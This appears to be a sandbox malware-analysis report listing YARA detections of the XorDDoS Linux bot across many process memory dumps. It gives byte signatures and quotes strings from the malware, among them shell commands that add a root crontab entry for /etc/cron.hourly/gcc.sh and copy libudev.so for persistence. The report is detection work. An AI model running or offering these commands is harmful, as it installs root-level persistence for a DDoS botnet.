6482.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6482.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6482.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6482.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6482.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6482.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6482.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6436.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6436.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6436.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6436.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6436.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6436.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6436.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6427.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6427.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6427.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6427.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6427.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6427.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6427.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6470.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6470.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6470.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6470.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6470.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6470.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6470.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6473.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6473.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6473.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6473.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6473.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6473.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6473.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6315.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6315.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6315.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6315.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6315.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6315.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6315.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6533.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6533.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6533.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6533.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6533.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6533.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6533.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6204.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6204.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6204.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6204.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6204.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6204.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6204.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
